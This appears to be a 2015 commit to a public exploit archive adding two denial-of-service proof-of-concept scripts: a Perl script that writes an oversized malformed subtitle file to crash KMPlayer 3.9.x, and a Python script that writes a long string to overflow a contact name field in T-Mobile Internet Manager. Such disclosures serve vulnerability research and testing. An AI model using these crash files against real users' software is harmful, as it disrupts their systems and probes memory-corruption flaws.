DB: 2015-08-01

2 new exploits
2015-08-01 05:02:01 +00:00 · 2015-08-01 05:02:01 +00:00 · 1fb7a38d9b
commit 1fb7a38d9b
parent 95ce541193
3 changed files with 61 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -34041,3 +34041,5 @@ id,file,description,date,author,platform,type,port
 37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
 37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
+37717,platforms/windows/dos/37717.pl,"KMPlayer 3.9.x - .srt Crash PoC",2015-07-31,"Peyman Motevalli Manesh",windows,dos,0
+37718,platforms/windows/dos/37718.py,"T-Mobile Internet Manager - Contact Name Crash PoC",2015-07-31,"SATHISH ARTHAR",windows,dos,0
--- a/platforms/windows/dos/37717.pl
+++ b/platforms/windows/dos/37717.pl
@ -0,0 +1,27 @@
+#!/usr/bin/perl -w
+# Title : KMPlayer 3.9.x - Crash Proof Of Concept
+# Company : http://www.kmplayer.com
+# Tested : Windows 7 / Windows 8.1
+#
+#
+# Author      :   Peyman Motevalli Manesh
+# Linkedin    :   https://ir.linkedin.com/in/peymanmotevalli
+# E-Mail      :   me[at]PDPnetwork[dot]ir 
+# Website     :   www.PDPnetwork.ir
+# FaceBook    :   https://www.facebook.com/Peyman.Motevalli
+#
+#
+# 1 . run perl code : perl km.pl
+# 2 . open "kmplayer"
+# 3 . Load Subtitle (Peyman.srt)
+# 4 . Crashed
+$eheader="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x14";
+$h="\x42"x9850;
+$poc="\x41"x500000;
+$poc="$h$poc$eheader";
+open (Peyman, '>Peyman.srt');
+for ($i=1;$i<=4;$i++){
+print Peyman "$i\n00:00:01,800 --> 00:00:05,500\n";
+print Peyman $poc;
+}
+close (Peyman);
--- a/platforms/windows/dos/37718.py
+++ b/platforms/windows/dos/37718.py
@ -0,0 +1,32 @@
+#!/usr/bin/python
+# coding: utf-8
+#[+] Author: SATHISH ARTHAR
+#[+] Exploit Title: T-Mobile Internet Manager Memory Corruption PoC
+#[+] Date: 30-07-2015
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows7/windows8
+#[+] Vendor: https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html
+#[+] Download: https://www.t-mobile.de/downloads/neu/winui.zip
+#[+] Sites: sathisharthars.wordpress.com
+#[+] Twitter: @sathisharthars
+#[+] Thanks: offensive security (@offsectraining)
+
+
+
+
+print"###########################################################"
+print"# Title: T-Mobile Internet Manager Memory Corruption PoC #"
+print"# Author: SATHISH ARTHAR #"
+print"# Category: DoS/PoC # "
+print"###########################################################"
+print"Copy the content of CRASH.TXT in create new contacts and paste
+it in Name field"
+print" contacts -----> create new -----> Name ----> paste it "
+
+
+crash= "A" * 2000
+filename = "CRASH.TXT"
+file = open(filename , "w")
+file.write(crash)
+print "\n Files Created!\n"
+file.close()